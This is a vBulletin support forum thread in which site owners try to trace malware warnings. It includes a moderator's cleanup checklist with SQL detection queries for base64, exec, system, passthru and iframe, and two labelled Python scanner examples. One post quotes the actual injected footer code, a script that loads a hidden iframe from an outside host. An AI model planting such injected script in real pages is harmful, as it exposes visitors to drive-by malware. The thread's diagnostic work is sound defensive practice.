
Forums triggering virus alerts


  • #16
    I would love to figure it out as well. I'm going to try disabling all advertising today and see what happens. I really don't suspect Google, but I'm running out of things to try.

    We have about 5k uniques a day and maybe 2-3 reporting issues. Thing is they're running IE7, IE8, IE9, and FF so it's not as isolated as I'd originally thought...
    Host for ShopFloorTalk.com



    • #17
      I have gotten several malware warnings over the last few weeks. I can't find a problem anywhere, but have read a number of complaints blaming Google Adsense ads. Most of those complaints have been going on in the Google help forums. This is not the only time it has happened. https://www.google.com/search?q=adse...ient=firefox-a
      If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
      www.TheFloorPro.com



      • #18
        Common insertion of virus warnings is they alter the footer template and replace the connection-min.js file in clientscript/yui/connection folder.

        To find exploits embedded in your system you can follow these steps:

        1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

        2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

        3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

        4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

        5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

        6) Make sure that your plugins do not include calls to exec(), system(), or passthru() or iframes. These are also often signs of a hacked site.

        Query for step 4 and 5 -
        SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

        7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';

        It checks the templates for compromising code.

        8) Check .htaccess to make sure there are no redirects there.

        Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API - Full / Mobile
        Vote for your favorite feature requests and the bugs you want to see fixed.
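
Added example, not part of the original post and not vBulletin code: steps 3 to 6 above applied to rows already selected from the plugin and template tables, using call-shaped patterns instead of substring matches and the iframe template list from step 3. The sample rows, the `.invalid` hosts and the narrowing of the exec/system/passthru pattern are assumptions made for the example.

```python
import re

# Templates that step 3 of the post lists as legitimately containing iframe tags.
IFRAME_ALLOWED = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
}

# Steps 4-6 as patterns that match calls rather than substrings, so words such
# as "filesystem" or "executed" do not fire. The lookbehind skips longer names
# (curl_exec) and method calls ($db->exec); that narrowing is an assumption.
RULES = {
    "base64": re.compile(r"\bbase64_(?:de|en)code\s*\(", re.I),
    "command-exec": re.compile(r"(?<![\w>:$])(?:exec|system|passthru)\s*\(", re.I),
    "remote-include": re.compile(
        r"\b(?:include|require)(?:_once)?\b[^;]*?(?:https?|ftp)://", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
}

def audit_plugins(rows):
    """rows: (title, hookname, phpcode) tuples selected from the plugin table."""
    return [(title, hook, rule)
            for title, hook, code in rows
            for rule, rx in RULES.items() if rx.search(code)]

def audit_templates(rows):
    """rows: (styleid, title, template) tuples selected from the template table."""
    return [(styleid, title) for styleid, title, body in rows
            if RULES["iframe"].search(body) and title not in IFRAME_ALLOWED]

# Constructed sample rows, not taken from any real board.
SAMPLE_PLUGINS = [
    ("Stats cache", "global_start",
     "$f = DIR . '/includes/filesystem.php'; // executed hourly"),
    ("Tracker", "ajax_complete", "$out = system(base64_decode($cmd));"),
    ("Loader", "init_startup", "include_once('http://cdn.example.invalid/x.txt');"),
]
SAMPLE_TEMPLATES = [
    (1, "bbcode_video", '<iframe src="//player.example.invalid/e"></iframe>'),
    (1, "footer", '<iframe src="http://ads.example.invalid/" width="0"></iframe>'),
]

if __name__ == "__main__":
    for finding in audit_plugins(SAMPLE_PLUGINS) + audit_templates(SAMPLE_TEMPLATES):
        print(finding)
```

The first sample plugin would be returned by the `LIKE '%system%'` and `LIKE '%exec%'` conditions but is not flagged here; the other two are.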



        • #19
          Originally posted by Wayne Luke
          Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.
          Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

          Jim
          If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
          www.TheFloorPro.com



          • #20
            Originally posted by eJM
            Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

            Jim
            Then you would need to be at 3.8.7 PL2.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API - Full / Mobile
            Vote for your favorite feature requests and the bugs you want to see fixed.



            • #21
              We are having the same issue.. Right after (footer template):

              PHP Code:
              <form action="$vboptions[forumhome].php" method="get" style="clear:$stylevar[left]">
              Something added:

              PHP Code:
              <script type="text/javascript" src="http://www.uptimeviewer.com/icons/icons.php"></script>
              Which inserts:
              HTML Code:
              GPad = {
                  init: function () {
                      document.write('');
                      var frame = document.createElement('iframe');
                      frame.setAttribute('src', 'http://www.alltagcloud.info/icons/index.php');
                      frame.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');
                      frame.style.visibility = 'hidden';
                      frame.style.display = 'none';
                      var div = document.getElementById('GPAD');
                      div.appendChild(frame);
                  }
              }
              GPad.init();
              I haven't yet figured out how it is being injected.. It could be vbseo, it could be vbulletin, could be a number of things I suppose.. I am searching the logs to no avail..
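
Added example, not part of the original post: the footer change described above contains only a script tag, so a `LIKE '%iframe%'` search over the template table does not return it, while a check of script and iframe sources against the board's own hosts does. `OWN_HOSTS`, the second script tag and the function names are assumptions made for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class SrcCollector(HTMLParser):
    """Record (tag, src) for every script and iframe tag in a template."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag in ("script", "iframe") and src:
            self.sources.append((tag, src))

def external_sources(template, own_hosts):
    """Return (tag, host) for script/iframe sources served from other hosts."""
    parser = SrcCollector()
    parser.feed(template)
    parser.close()
    hits = []
    for tag, src in parser.sources:
        host = (urlsplit(src).hostname or "").lower()
        if host and host not in own_hosts:   # relative URLs have no host
            hits.append((tag, host))
    return hits

def like_iframe(template):
    """Equivalent of the thread's  template LIKE '%iframe%'  check."""
    return "iframe" in template.lower()

# Footer as described in the post: the form line, then the injected script tag.
# The second script tag and OWN_HOSTS are constructed for the example.
FOOTER = (
    '<form action="$vboptions[forumhome].php" method="get" style="clear:$stylevar[left]">\n'
    '<script type="text/javascript" src="http://www.uptimeviewer.com/icons/icons.php"></script>\n'
    '<script type="text/javascript" src="clientscript/vbulletin_menu.js"></script>\n'
    '</form>'
)
OWN_HOSTS = {"forum.example.invalid"}

if __name__ == "__main__":
    print("LIKE '%iframe%' hit:", like_iframe(FOOTER))
    print("external sources:", external_sources(FOOTER, OWN_HOSTS))
```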



              • #22
                Have you posted that information at vBSEO forums, Jafo?
                If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
                www.TheFloorPro.com



                • #23
                  I have not.. However, I am going to monitor all changes to the templates database. I have it set up to immediately notify me if any change is made to any template to see if I can catch it next time..



                  • #24
                    So... Has anyone run the steps that I listed above? What were the results?
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API - Full / Mobile
                    Vote for your favorite feature requests and the bugs you want to see fixed.



                    • #25
                      Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

                      What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.



                      • #26
                        Originally posted by Jafo
                        Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

                        What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.
                        I asked because in our recent experience, people have actually been exploited months before the symptoms come up. One of the common exploits is to tie a plugin into a rarely used hook that processes commands that are then passed to the command line or database directly.
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API - Full / Mobile
                        Vote for your favorite feature requests and the bugs you want to see fixed.



                        • #27
                          Should that happen, my monitoring should catch that. I am going to assume for prudence's sake that those using this exploit are watching, so I will shoot you a PM on how I am monitoring it..



                          • #28
                            Originally posted by Wayne Luke
                            So... Has anyone run the steps that I listed above? What were the results?
                            Yep and I didn't find a thing. The only mods we have running are vbStopForumSpam and Forum Runner. Neither of those appear to be a point of infection either and I'm at a complete loss right now...
                            Host for ShopFloorTalk.com



                            • #29
                              Hmm, we are running forum runner too.. That might be the common thread?



                              • #30
                                Maybe... I hadn't seriously considered them, but anything is possible I guess.

                                I have AOL and Google ads on my site and have gone into Google to block all Google Certified Ad Networks just to see what happens. So far no reports of infection, but I just did this about 2 hours ago so time will tell as I've only been getting a couple of complaints each day.
                                Host for ShopFloorTalk.com
